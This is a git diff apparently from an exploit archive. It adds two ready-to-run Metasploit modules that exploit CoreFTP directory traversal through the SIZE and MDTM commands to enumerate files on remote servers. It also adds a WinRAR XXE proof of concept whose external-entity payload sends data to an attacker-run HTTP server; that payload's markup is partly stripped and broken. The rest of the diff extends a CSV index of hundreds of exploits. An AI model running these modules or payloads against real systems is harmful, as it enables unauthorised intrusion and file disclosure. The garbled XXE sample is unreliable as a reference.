000000000..f1b6349ac --- /dev/null +++ b/exploits/windows/remote/48194.txt @@ -0,0 +1,48 @@ +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Ftp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + def proto + 'ftp' + end + def initialize + super( + 'Name' => 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal', + 'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information}, + 'Author' => [ 'Kevin Randall' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-9648' ], + [ 'BID', '107446' ], + [ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ] + ], + 'Disclosure Date:' => 'March 13 2019' + ) + register_options([ + Opt::RPORT(21), + OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ), + OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ), + OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] ) + ]) + end + def run_host(ip) + print_status("Logging into FTP server now with supplied credentials") + c = connect_login + return if not c + print_status("Performing exploitation of the SIZE command to enumerate files") + path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME'] + res = send_cmd( ['SIZE', "C: ", path ], true, nsock = self.sock) + data = res.to_s + print_status("Performing analysis.... Please wait") + if (data.include? "213" ) + print_good ("And the circle hits the square!") + print_good ("File Exists. Here is the filesize:"+ data[4..-1]) + return res + else + print_error("Mission Failed We'll get them next time!") + print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect") + return res + end + end + end \ No newline at end of file diff --git a/exploits/windows/remote/48195.txt b/exploits/windows/remote/48195.txt new file mode 100644 index 000000000..8b6062cc2 --- /dev/null +++ b/exploits/windows/remote/48195.txt @@ -0,0 +1,48 @@ +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Ftp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + def proto + 'ftp' + end + def initialize + super( + 'Name' => 'CVE-2019-9649 CoreFTP FTP Server Version 674 and below MDTM Directory Traversal', + 'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. Using the MDTM FTP command, a remote attacker can use a directory traversal (..\..\) to browse outside the root directory to determine the existence of a file on the operating system, and the last mofidied date.}, + 'Author' => [ 'Kevin Randall' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2019-9649' ], + [ 'BID', '107449' ], + [ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ] + ], + 'Disclosure Date:' => 'March 13 2019' + ) + register_options([ + Opt::RPORT(21), + OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ), + OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ), + OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] ) + ]) + end + def run_host(ip) + print_status("Logging into FTP server now with supplied credentials") + c = connect_login + return if not c + print_status("Performing exploitation of the MDTM command to enumerate files") + path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME'] + res = send_cmd( ['MDTM', "C: ", path ], true, nsock = self.sock) + data = res.to_s + print_status("Performing analysis.... Please wait") + if (data.include? "213" ) + print_good ("And the circle hits the square!") + print_good ("File Exists. Here is the last modified date for the file:"+ data[4..-1]) + return res + else + print_error("Mission Failed We'll get them next time!") + print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect") + return res + end + end + end \ No newline at end of file diff --git a/exploits/xml/local/47526.txt b/exploits/xml/local/47526.txt new file mode 100644 index 000000000..60f9f0872 --- /dev/null +++ b/exploits/xml/local/47526.txt @@ -0,0 +1,38 @@ +# Exploit Title: winrar 5.80 - XML External Entity Injection +# Exploit Author: hyp3rlinx +# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe +# Version: 5.80 +# Tested on: Microsoft Windows Version 10.0.18362.418 64bit + +# POC + +1- python -m SimpleHTTPServer (listens Port 8000) +2- open winrar or any file.rar +3- help +4- help topics +5- Drag the exploit to the window + + +html file + + + + + + + +%dtd;]> +&send; + + + + + + +============================== +start.dtd + + +"> +%all; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f01140a68..43ce6e9f5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6025,6 +6025,7 @@ id,file,description,date,author,type,platform,port 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80 45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux, 44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, +44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux, 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows, @@ -6578,6 +6579,9 @@ id,file,description,date,author,type,platform,port 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows, +47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows, +47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos, +47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos, 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows, 47414,exploits/windows/dos/47414.txt,"Microsoft Windows cryptoapi - SymCrypt Modular Inverse Algorithm Denial of Service",2019-09-24,"Google Security Research",dos,windows, 47415,exploits/ios/dos/47415.txt,"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds",2019-09-24,"Google Security Research",dos,ios, @@ -6646,10 +6650,13 @@ id,file,description,date,author,type,platform,port 47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows, 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos, 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows, +47795,exploits/windows/dos/47795.py,"SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows, 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows, 47800,exploits/php/dos/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,dos,php, +47801,exploits/windows/dos/47801.py,"XnConvert 1.82 - Denial of Service (PoC)",2019-12-23,Gokkulraj,dos,windows, 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows, 47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows, +47849,exploits/windows/dos/47849.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, 47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, 47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, 47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, @@ -6667,6 +6674,7 @@ id,file,description,date,author,type,platform,port 47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, 47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows, 47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows, +47872,exploits/windows/dos/47872.py,"SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, 47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows, 47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows, 47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows, @@ -6685,6 +6693,7 @@ id,file,description,date,author,type,platform,port 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows, 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple, 47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows, +47963,exploits/windows/dos/47963.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows, 47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows, 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, 47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux, @@ -10814,6 +10823,7 @@ id,file,description,date,author,type,platform,port 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux, 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos, 47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux, +47081,exploits/freebsd/local/47081.sh,"FreeBSD 12.0 - 'fd' Local Privilege Escalation",2019-07-10,gr4yf0x,local,freebsd, 47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows, 47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows, 47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows, @@ -10858,6 +10868,8 @@ id,file,description,date,author,type,platform,port 47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows, 47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows, 47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos, +47409,exploits/ios/local/47409.txt,"iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation",2019-09-23,"Umang Raghuvanshi",local,ios, +47411,exploits/windows/local/47411.py,"Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH)",2019-09-24,x00pwn,local,windows, 47421,exploits/linux/local/47421.rb,"ABRT - sosreport Privilege Escalation (Metasploit)",2019-09-25,Metasploit,local,linux, 47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows, 47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows, @@ -10865,6 +10877,7 @@ id,file,description,date,author,type,platform,port 47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux, 47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64, 47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows, +47476,exploits/windows/local/47476.py,"DeviceViewer 3.12.0.1 - Arbitrary Password Change",2019-10-09,"Alessandro Magnosi",local,windows, 47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows, 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux, 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows, @@ -10880,6 +10893,7 @@ id,file,description,date,author,type,platform,port 47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows, 47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows, 47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows, +47526,exploits/xml/local/47526.txt,"Winrar 5.80 - XML External Entity Injection",2019-10-21,hyp3rlinx,local,xml, 47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows, 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris, 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows, @@ -10991,6 +11005,7 @@ id,file,description,date,author,type,platform,port 47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows, 47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows, 47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows, +47981,exploits/windows/local/47981.txt,"Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution",2020-01-30,"Eduardo Braun Prado",local,windows, 47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux, 48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux, 48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows, @@ -18052,11 +18067,13 @@ id,file,description,date,author,type,platform,port 47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25 47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80 +47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware, 47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple, 47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux, 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows, 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86, 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple, +47157,exploits/android/remote/47157.txt,"Android 7 < 9 - Remote Code Execution",2019-07-24,"Marcin Kozlowski",remote,android, 47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix, 47187,exploits/php/remote/47187.rb,"WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80 47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379 @@ -18146,6 +18163,9 @@ id,file,description,date,author,type,platform,port 48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple, 48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux, 48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php, +48194,exploits/windows/remote/48194.txt,"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows, +48195,exploits/windows/remote/48195.txt,"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows, +48196,exploits/linux/remote/48196.txt,"CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)",2020-03-11,AkkuS,remote,linux, 48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware, 48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux, 48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple, @@ -42141,6 +42161,7 @@ id,file,description,date,author,type,platform,port 47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php, 47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80 47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,UserX,webapps,php,80 +47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",2019-07-25,"Giovanni Chhatta",webapps,php, 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp, 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443 @@ -42192,6 +42213,7 @@ id,file,description,date,author,type,platform,port 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux, 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80 47295,exploits/php/webapps/47295.html,"WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php, +47299,exploits/php/webapps/47299.php,"Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation",2019-08-21,"Jak Gibb",webapps,php, 47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple, 47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows, 47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80 @@ -42208,16 +42230,19 @@ id,file,description,date,author,type,platform,port 47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php, 47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80 47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80 +47330,exploits/linux/webapps/47330.rb,"Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)",2019-09-02,"James Bercegay",webapps,linux, 47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php, 47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php, 47338,exploits/multiple/webapps/47338.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting",2019-09-02,Aetsu,webapps,multiple, 47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple, 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple, +47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple, 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php, 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php, 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, +47359,exploits/php/webapps/47359.txt,"Publisure Hybrid - Multiple Vulnerabilities",2019-09-06,"Jean-Marie Bourbon",webapps,php, 47361,exploits/php/webapps/47361.pl,"WordPress Core 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php, 47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80 47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple, @@ -42237,6 +42262,7 @@ id,file,description,date,author,type,platform,port 47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80 47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php, 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php, +47391,exploits/jsp/webapps/47391.go,"NetGain EM Plus 10.1.68 - Remote Command Execution",2019-09-16,azams,webapps,jsp, 47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm, 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php, 47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php, @@ -42245,6 +42271,7 @@ id,file,description,date,author,type,platform,port 47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php, 47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php, 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple, +47413,exploits/php/webapps/47413.py,"Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection",2019-09-24,"Nassim Asrir",webapps,php, 47417,exploits/aspx/webapps/47417.txt,"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting",2019-09-25,"Davide Cioccia",webapps,aspx, 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php, 47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json, @@ -42266,9 +42293,11 @@ id,file,description,date,author,type,platform,port 47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80 47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python, 47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python, +47443,exploits/php/webapps/47443.rb,"WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion",2019-09-30,"Ahmad Almorabea",webapps,php, 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple, 47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php, 47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80 +47449,exploits/multiple/webapps/47449.txt,"DotNetNuke 9.3.2 - Cross-Site Scripting",2019-10-01,"Semen Alexandrovich Lyhin",webapps,multiple, 47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80 47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux, 47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple, @@ -42517,6 +42546,7 @@ id,file,description,date,author,type,platform,port 48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java, 